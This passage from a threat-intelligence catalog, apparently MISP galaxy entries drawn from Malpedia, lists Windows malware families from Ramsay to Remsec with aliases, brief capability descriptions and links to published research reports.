https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html
http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/
https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/
https://www.youtube.com/watch?v=N4f2e8Mygag
https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/
https://redcanary.com/resources/webinars/deep-dive-process-injection/
https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf
https://research.checkpoint.com/ramnits-network-proxy-servers/
http://www.secureworks.com/research/threat-profiles/gold-fairfax
http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html
https://www.youtube.com/watch?v=l6ZunH6YG0A
https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89
https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree
https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail

Ramsay

The tag is: misp-galaxy:malpedia="Ramsay"

Ramsay is also known as:

Table 2466. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay
https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/
https://www.antiy.cn/research/notice&report/research_report/20200522.html
https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html
https://www.youtube.com/watch?v=SKIu4LqMrns
https://www.sentinelone.com/blog/why-on-device-detection-matters-new-ramsay-trojan-targets-air-gapped-networks/

Ranbyus

The tag is: misp-galaxy:malpedia="Ranbyus"

Ranbyus is also known as:

Table 2467. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus
https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf
https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/
https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/
http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html
https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/

Ranscam

The tag is: misp-galaxy:malpedia="Ranscam"

Ranscam is also known as:

Table 2468. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam
http://blog.talosintel.com/2016/07/ranscam.html

Ransoc

The tag is: misp-galaxy:malpedia="Ransoc"

Ransoc is also known as:

Table 2469. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc
https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles

RansomEXX (Windows)

RansomExx is a ransomware family that targeted multiple companies starting in mid-2020. It shares commonalities with Defray777.

The tag is: misp-galaxy:malpedia="RansomEXX (Windows)"

RansomEXX (Windows) is also known as:

Defray777
Ransom X

Table 2470. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3
https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/
https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware
https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/
https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/
https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/
https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/
https://github.com/Bleeping/Ransom.exx
https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/
https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf
https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/
https://www.youtube.com/watch?v=qxPXxWMI2i4
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/
https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/
https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

Ransomlock

The tag is: misp-galaxy:malpedia="Ransomlock"

Ransomlock is also known as:

WinLock

Table 2471. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock
https://forum.malekal.com/viewtopic.php?t=36485&start=
https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2

SNC

Ransomware SNC is a ransomware who encrypts files and asks for a variable amount of Bitcoin before releasing the decryption key to your files. The threat actor asks to be contacted for negotiating the right ransom fee.

The tag is: misp-galaxy:malpedia="SNC"

SNC is also known as:

Table 2472. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomware_snc
https://yomi.yoroi.company/report/5deea91bac2ea1dcf5337ad8/5deead588a4518a7074dc6e6/overview

Rapid Ransom

The tag is: misp-galaxy:malpedia="Rapid Ransom"

Rapid Ransom is also known as:

Table 2473. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom
https://twitter.com/malwrhunterteam/status/997748495888076800
https://www.youtube.com/watch?v=LUxOcpIRxmg
https://twitter.com/malwrhunterteam/status/977275481765613569
https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do
https://exchange.xforce.ibmcloud.com/collection/GuessWho-Ransomware-A-Variant-of-Rapid-Ransomware-ef226b9792fa4c1e34fa4c587db04145

RapidStealer

The tag is: misp-galaxy:malpedia="RapidStealer"

RapidStealer is also known as:

Table 2474. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer
http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html

Rarog

The tag is: misp-galaxy:malpedia="Rarog"

Rarog is also known as:

Table 2475. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog
https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/
https://tracker.fumik0.com/malware/Rarog

rarstar

The tag is: misp-galaxy:malpedia="rarstar"

rarstar is also known as:

Table 2476. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar
https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses

Ratankba

This is a backdoor that establishes persistence using the Startup folder. It communicates to its C&C server using HTTPS and a static HTTP User-Agent string. QUICKRIDE is capable of gathering information about the system, downloading and loading executables, and uninstalling itself. It was leveraged against banks in Poland.

The tag is: misp-galaxy:malpedia="Ratankba"

Ratankba is also known as:

QUICKRIDE

Table 2477. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba
https://content.fireeye.com/apt/rpt-apt38
https://www.secureworks.com/research/threat-profiles/nickel-gladstone
https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf
http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html
https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware-0
https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html
https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/
https://twitter.com/PhysicalDrive0/status/828915536268492800
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware

RatankbaPOS

The tag is: misp-galaxy:malpedia="RatankbaPOS"

RatankbaPOS is also known as:

RATANKBAPOS

Table 2478. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankbapos
http://blog.trex.re.kr/3
https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf

RatSnif

The tag is: misp-galaxy:malpedia="RatSnif"

RatSnif is also known as:

Table 2479. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ratsnif
https://www.secureworks.com/research/threat-profiles/tin-woodlawn
https://threatvector.cylance.com/en_us/home/threat-spotlight-ratsnif-new-network-vermin-from-oceanlotus.html

RawPOS

The tag is: misp-galaxy:malpedia="RawPOS"

RawPOS is also known as:

Table 2480. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos
https://www.youtube.com/watch?v=fevGZs0EQu8
https://threatvector.cylance.com/en_us/home/rawpos-malware.html
http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite

Razy

Razy is a malware family which uses a malicious browser extension in order to steal cryptocurrency.

The tag is: misp-galaxy:malpedia="Razy"

Razy is also known as:

Table 2481. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.razy
https://securelist.com/razy-in-search-of-cryptocurrency/89485/

RC2FM

A family identified by ESET Research in the InvisiMole campaign.

The tag is: misp-galaxy:malpedia="RC2FM"

RC2FM is also known as:

Table 2482. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rc2fm
https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

RCS

The tag is: misp-galaxy:malpedia="RCS"

RCS is also known as:

Crisis
Remote Control System

Table 2483. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs
https://www.f-secure.com/documents/996508/1030745/callisto-group
https://www.vice.com/en_us/article/jgxvdx/jan-marsalek-wirecard-bizarre-attempt-to-buy-hacking-team-spyware
https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines
http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html
https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/
https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?
https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/
http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html
https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/

RCtrl

The tag is: misp-galaxy:malpedia="RCtrl"

RCtrl is also known as:

Table 2484. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rctrl
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/

rdasrv

The tag is: misp-galaxy:malpedia="rdasrv"

rdasrv is also known as:

Table 2485. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rdasrv
https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf

RDAT

The tag is: misp-galaxy:malpedia="RDAT"

RDAT is also known as:

GREYSTUFF

Table 2486. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf
https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/

ReactorBot

Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.

The tag is: misp-galaxy:malpedia="ReactorBot"

ReactorBot is also known as:

Table 2487. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot
https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under
http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html
http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/
http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html

Reaver

Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the "Five Poisons" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government.

The tag is: misp-galaxy:malpedia="Reaver"

Reaver is also known as:

Table 2488. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver
https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/
https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html

RedAlpha

The tag is: misp-galaxy:malpedia="RedAlpha"

RedAlpha is also known as:

Table 2489. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha
https://www.recordedfuture.com/redalpha-cyber-campaigns/

RedDelta

RedDelta variant of PlugX as used by Mustang Panda.

The tag is: misp-galaxy:malpedia="RedDelta"

RedDelta is also known as:

Table 2490. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.reddelta
https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader

RedLeaves

The tag is: misp-galaxy:malpedia="RedLeaves"

RedLeaves is also known as:

BUGJUICE

Table 2491. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves
https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf
http://blog.macnica.net/blog/2017/12/post-8c22.html
https://www.accenture.com/t20180423T055005Zw/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf[https://www.accenture.com/t20180423T055005Zw/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf]
https://www.accenture.com/t20180423T055005Z_w_/se-en/acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf[https://www.accenture.com/t20180423T055005Z_w/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf]
https://www.carbonblack.com/2017/05/09/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-side-loading/
https://community.rsa.com/community/products/netwitness/blog/2017/05/03/hunting-pack-use-case-redleaves-malware
http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf
https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html
https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf
https://www.secureworks.com/research/threat-profiles/bronze-riverside
https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves
http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html
https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf
https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
https://www.jpcert.or.jp/magazine/acreport-redleaves.html
https://www.us-cert.gov/ncas/alerts/TA17-117A

RedLine Stealer

RedLine Stealer is a malware available on underground forums for sale apparently as standalone versions or also on a subscription basis. This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.

The tag is: misp-galaxy:malpedia="RedLine Stealer"

RedLine Stealer is also known as:

Table 2492. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign
https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://cyber-anubis.github.io/malware%20analysis/redline/
https://blogs.blackberry.com/en/2021/07/threat-thursday-redline-infostealer
https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware
https://securityintelligence.com/posts/roboski-global-recovery-automation/
https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns
https://blog.minerva-labs.com/redline-stealer-masquerades-as-telegram-installer
https://www.ciphertechsolutions.com/roboski-global-recovery-automation/
https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers
https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html
https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack
https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md
https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/
https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html

Redosdru

The tag is: misp-galaxy:malpedia="Redosdru"

Redosdru is also known as:

Table 2493. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.redosdru
https://securitynews.sonicwall.com/xmlpost/redosdru-v-malware-that-hides-in-encrypted-dll-files-to-avoid-detection-by-firewalls-may-112016/

REDPEPPER

The tag is: misp-galaxy:malpedia="REDPEPPER"

REDPEPPER is also known as:

Adupib

Table 2494. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.redpepper
https://twitter.com/ItsReallyNick/status/1136502701301346305

RedRum

Ransomware.

The tag is: misp-galaxy:malpedia="RedRum"

RedRum is also known as:

Grinch
Thanos
Tycoon

Table 2495. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.redrum
https://id-ransomware.blogspot.com/2019/12/redrum-ransomware.html

REDSALT

The tag is: misp-galaxy:malpedia="REDSALT"

REDSALT is also known as:

Dipsind

Table 2496. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt
https://twitter.com/ItsReallyNick/status/1136502701301346305
https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s01-hunting-for-platinum.pdf

REDSHAWL

REDSHAWL is a session hijacking utility that starts a new process as another user currently logged on to the same system via command-line.

The tag is: misp-galaxy:malpedia="REDSHAWL"

REDSHAWL is also known as:

Table 2497. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl
https://content.fireeye.com/apt/rpt-apt38
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf

Redyms

The tag is: misp-galaxy:malpedia="Redyms"

Redyms is also known as:

Table 2498. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.redyms
https://www.welivesecurity.com/2013/02/04/what-do-win32redyms-and-tdl4-have-in-common/

Red Alert

The tag is: misp-galaxy:malpedia="Red Alert"

Red Alert is also known as:

Table 2499. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.red_alert
https://twitter.com/JaromirHorejsi/status/816237293073797121

Red Gambler

The tag is: misp-galaxy:malpedia="Red Gambler"

Red Gambler is also known as:

Table 2500. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler
http://image.ahnlab.com/file_upload/asecissue_files/ASEC%20REPORT_vol.91.pdf

reGeorg

The tag is: misp-galaxy:malpedia="reGeorg"

reGeorg is also known as:

Table 2501. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg
https://www.secureworks.com/research/samsam-ransomware-campaigns
https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF
https://sensepost.com/discover/tools/reGeorg/
https://www.secureworks.com/blog/ransomware-deployed-by-adversary
https://github.com/sensepost/reGeorg

Regin

Regin is a sophisticated malware and hacking toolkit attributed to United States' National Security Agency (NSA) for government spying operations. It was first publicly revealed by Kaspersky Lab, Symantec, and The Intercept in November 2014. Regin malware targeted victims in a range of industries, telecom, government, and financial institutions. It was engineered to be modular and over time dozens of modules have been found and attributed to this family. Symantec observed around 100 infections in 10 different countries across a variety of organisations including private companies, government entities, and research institutes.

The tag is: misp-galaxy:malpedia="Regin"

Regin is also known as:

Table 2502. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.regin
https://www.youtube.com/watch?v=jeLd-gw2bWo
https://www.epicturla.com/previous-works/hitb2020-voltron-sta
https://www.kaspersky.com/blog/regin-apt-most-sophisticated/6852/
https://securelist.com/big-threats-using-code-similarity-part-1/97239/
https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments
https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/regin-top-tier-espionage-tool-15-en.pdf

RegretLocker

The tag is: misp-galaxy:malpedia="RegretLocker"

RegretLocker is also known as:

Table 2503. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker
http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/
https://www.bleepingcomputer.com/news/security/new-regretlocker-ransomware-targets-windows-virtual-machines/
https://twitter.com/malwrhunterteam/status/1321375502179905536

RekenSom

Ransomware.

The tag is: misp-galaxy:malpedia="RekenSom"

RekenSom is also known as:

GHack Ransomware

Table 2504. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rekensom
https://id-ransomware.blogspot.com/2020/03/rekensom-ransomware.html

win.rekoobe

A Trojan for Winows with the same code structure and functionalities of elf.rekoobe, for Linux environment instead.

The tag is: misp-galaxy:malpedia="win.rekoobe"

win.rekoobe is also known as:

tinyshell.win
tshd.win

Table 2505. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rekoobew
https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/

Rekt Loader

The tag is: misp-galaxy:malpedia="Rekt Loader"

Rekt Loader is also known as:

Table 2506. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rektloader
https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html

Rektware

The tag is: misp-galaxy:malpedia="Rektware"

Rektware is also known as:

PRZT Ransomware

Table 2507. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.rektware
https://id-ransomware.blogspot.com/2018/09/rektware-ransomware.html

RemCom

The tag is: misp-galaxy:malpedia="RemCom"

RemCom is also known as:

RemoteCommandExecution

Table 2508. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcom
https://doublepulsar.com/second-zerologon-attacker-seen-exploiting-internet-honeypot-c7fb074451ef
http://www.secureworks.com/research/threat-profiles/gold-franklin

Remcos

Remcos (acronym of Remote Control & Surveillance Software) is a Remote Access Software used to remotely control computers. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos can be used for surveillance and penetration testing purposes, and in some instances has been used in hacking campaigns.

The tag is: misp-galaxy:malpedia="Remcos"

Remcos is also known as:

RemcosRAT
Remvio
Socmer

Table 2509. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service
https://dissectingmalwa.re/malicious-ratatouille.html
https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads
https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter
https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD
https://www.telsy.com/download/4832/
https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html
https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html
https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html
https://secrary.com/ReversingMalware/RemcosRAT/
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage
https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html
https://www.welivesecurity.com/2021/10/06/moon-hack-fake-safemoon-cryptocurrency-app-drops-malware-spy/
https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/
https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire
https://www.trendmicro.com/en_ca/research/19/h/analysis-new-remcos-rat-arrives-via-phishing-email.html
https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2
https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html
https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/
https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/
https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update
https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers
https://www.ciphertechsolutions.com/roboski-global-recovery-automation/
http://malware-traffic-analysis.net/2017/12/22/index.html
https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/
https://news.sophos.com/en-us/2020/05/14/raticate/
https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly
https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt
https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/
https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf
https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/
https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/
https://securityintelligence.com/posts/roboski-global-recovery-automation/
https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware
https://www.vmray.com/cyber-security-blog/smart-memory-dumping/
https://www.youtube.com/watch?v=DIH4SvKuktM
https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

Remexi

The tag is: misp-galaxy:malpedia="Remexi"

Remexi is also known as:

CACHEMONEY

Table 2510. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi
https://www.secureworks.com/research/threat-profiles/cobalt-hickman
https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf
https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions
http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf
https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions
https://securelist.com/chafer-used-remexi-malware/89538/
https://twitter.com/QW5kcmV3/status/1095833216605401088

RemoteAdmin

The tag is: misp-galaxy:malpedia="RemoteAdmin"

RemoteAdmin is also known as:

Table 2511. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.remoteadmin
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=hacktool:win32/remoteadmin&ThreatID=2147731874

RemoteControl

The tag is: misp-galaxy:malpedia="RemoteControl"

RemoteControl is also known as:

remotecontrolclient

Table 2512. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.remotecontrolclient
https://github.com/frozleaf/RemoteControl

Remsec

The tag is: misp-galaxy:malpedia="Remsec"

Remsec is also known as:

Table 2513. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider
